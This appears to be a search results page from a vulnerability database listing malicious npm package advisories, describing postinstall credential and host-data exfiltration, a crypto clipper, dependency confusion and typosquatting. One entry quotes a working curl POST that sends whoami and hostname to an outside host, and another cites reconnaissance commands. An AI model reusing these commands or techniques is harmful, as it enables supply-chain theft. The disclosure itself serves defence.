Lucene search
K

1845 matches found

OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/25 6:12 p.m.12 views

Malicious code in @databus-service-ui/ui-event (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b82b3af71dce087a185cffa6f3691ad5a4e4c3d9e35154070ef4ad0dd4f15b10 scripts/postinstall.js performs two install-time attacks against any machine that runs npm install. 1 Credential exfiltration: it iterates process.en...

6.4AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/25 5:31 p.m.17 views

Malicious code in verify-mycommand (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2f94ffb54a2471d0cc94ce1ea88f741e034221a374f17bfadbd609cb22f14f24 On npm install, postinstall.js executes whoami and id, collects host identity hostname, platform, cwd and CI metadata CI, GITHUBREPOSITORY, NODEENV...

5.8AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/24 7:40 p.m.13 views

Malicious code in @stockrepublic/republic-components (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 300b309644b646817c47a283d8b9aaa018e8ae0f59986207f55fd0c39dca872a The package masquerades as an internal @stockrepublic component version 99.0.0, description 'Runs git diff and saves the output to git.log on install...

5.8AI score
Exploits0References2
OSV
OSV
added 2026/05/24 7:40 p.m.10 views

MAL-2026-4289 Malicious code in @stockrepublic/republic-components (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 300b309644b646817c47a283d8b9aaa018e8ae0f59986207f55fd0c39dca872a The package masquerades as an internal @stockrepublic component version 99.0.0, description 'Runs git diff and saves the output to git.log on install...

5.8AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/24 6:38 p.m.15 views

Malicious code in clipboard-guardian (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6cf1e5328821dbb36e54a2d796ad934ebe79257f8927e2ba741016c4a0f2c79d This package is a cryptocurrency clipper masquerading as a clipboard-protection tool. Its postinstall script npm-install.cjs writes 30+ hardcoded...

5.8AI score
Exploits0References4
OSV
OSV
added 2026/05/24 6:38 p.m.8 views

MAL-2026-4290 Malicious code in clipboard-guardian (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6cf1e5328821dbb36e54a2d796ad934ebe79257f8927e2ba741016c4a0f2c79d This package is a cryptocurrency clipper masquerading as a clipboard-protection tool. Its postinstall script npm-install.cjs writes 30+ hardcoded...

5.8AI score
Exploits0References4
OSV
OSV
added 2026/05/24 11:5 a.m.10 views

MAL-2026-4274 Malicious code in power-apps (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f68653eed66e7343973bc919788864990337f7645072d32a9d7465d4bf4ff4e7 On npm install, postinstall.js executes whoami, id, and reads os.hostname, os.platform, process.cwd, and CI/GitHub environment variables, then sends...

5.8AI score
Exploits0References3
OSV
OSV
added 2026/05/23 5:52 p.m.10 views

MAL-2026-4267 Malicious code in @newline53/newline-ts-sdk (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 475a7ac4130ef9c168565439f8cac230fce87b1d59bc116caec6c712f3a5dc60 On npm install, the postinstall hook node install.js collects os.hostname and os.userInfo.username along with the package name, encodes them as a DNS...

5.8AI score
Exploits0References3
OSV
OSV
added 2026/05/23 3:56 p.m.8 views

MAL-2026-4266 Malicious code in discovery-build (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c24a1e59b8c5d3ae1059499825bf47d1abe8d362ddefe264f1a429ed9e7e98cc package.json declares scripts.postinstall=node postinstall.js, which executes unconditionally on npm install. The script collects host identifiers...

5.8AI score
Exploits0References4
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/23 3:56 p.m.12 views

Malicious code in discovery-build (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c24a1e59b8c5d3ae1059499825bf47d1abe8d362ddefe264f1a429ed9e7e98cc package.json declares scripts.postinstall=node postinstall.js, which executes unconditionally on npm install. The script collects host identifiers...

5.8AI score
Exploits0References4
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/23 2:52 p.m.12 views

Malicious code in @asavie/i18n (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d803002ee95ea92bdcb3a918e1be10930816db383ce2a58a6947afea84e04040 @asavie/[email protected] is a dependency-confusion package targeting an unclaimed npm scope. Its package.json declares a preinstall hook that runs node...

5.9AI score
Exploits0References3
OSV
OSV
added 2026/05/23 2:52 p.m.9 views

MAL-2026-4265 Malicious code in @asavie/i18n (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d803002ee95ea92bdcb3a918e1be10930816db383ce2a58a6947afea84e04040 @asavie/[email protected] is a dependency-confusion package targeting an unclaimed npm scope. Its package.json declares a preinstall hook that runs node...

5.9AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/23 2:15 a.m.10 views

Malicious code in dds-js-idl (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c864bc6e21a3795faba4de876942dfffa4baed76c926d96d52c83c32d1f49f69 On npm install, postinstall.js runs whoami via execSync and collects os.hostname, os.platform, cwd, and CI/GitHub env vars, then exfiltrates them ove...

5.8AI score
Exploits0References2
OSV
OSV
added 2026/05/23 2:15 a.m.9 views

MAL-2026-4264 Malicious code in dds-js-idl (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c864bc6e21a3795faba4de876942dfffa4baed76c926d96d52c83c32d1f49f69 On npm install, postinstall.js runs whoami via execSync and collects os.hostname, os.platform, cwd, and CI/GitHub env vars, then exfiltrates them ove...

5.8AI score
Exploits0References2
OSV
OSV
added 2026/05/21 6:52 p.m.11 views

MAL-2026-4288 Malicious code in @jaggle/resizeobserves (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3fe4b050d79ecfc702c9222cf3347e49d4530efd23a2120ee040ef32e0a76e4f Package name impersonates the popular @juggle/resize-observer j→j substitution and pluralized 'resizeobserves' and the README is copied verbatim from...

5.8AI score
Exploits0References19
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/21 6:52 p.m.14 views

Malicious code in @jaggle/resizeobserves (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3fe4b050d79ecfc702c9222cf3347e49d4530efd23a2120ee040ef32e0a76e4f Package name impersonates the popular @juggle/resize-observer j→j substitution and pluralized 'resizeobserves' and the README is copied verbatim from...

5.8AI score
Exploits0References19
OSV
OSV
added 2026/05/21 1:18 p.m.7 views

MAL-2026-4229 Malicious code in @luke-101141/nobody (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8a22de475581dbf26085c2605781782a61205eb62add0a261eabe2357ac2cbc8 On require, index.js executes curl -X POST "http://frgthyujiouyh.requestcatcher.com/noderedactedsdk/$whoami/$hostname/", leaking the installing user'...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/20 6:14 p.m.11 views

Malicious code in private-next-pages (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 00c6505c70734328f859fa758ad45ba680403a4cfeedd60d2f9e035b026bd45c package.json declares a postinstall script that uses Node's childprocess to execute reconnaissance commands including whoami and beacon results out v...

5.9AI score
Exploits0References1
OSV
OSV
added 2026/05/20 2:47 p.m.9 views

MAL-2026-4184 Malicious code in stripe-internal-utils (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b6add7fd3034c5b0d00e39e2cbfeb7c664085ef412612b53ebe9fd81767449be package.json declares a postinstall hook that auto-fires on npm install and performs reconnaissance + exfiltration against the installer. The inline...

5.8AI score
Exploits0References1
OSV
OSV
added 2026/05/19 9:55 p.m.12 views

MAL-2026-4177 Malicious code in did-0091 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1a50f30be232b343bc9dff677d6c208f16fff861009dccc9f76409d37264205b On npm install, the package's postinstall script runs node -e to fetch the installer's public IP from api.ipify.org, execute id || ver && whoami &&...

5.9AI score
Exploits0References1
Rows per page
Query Builder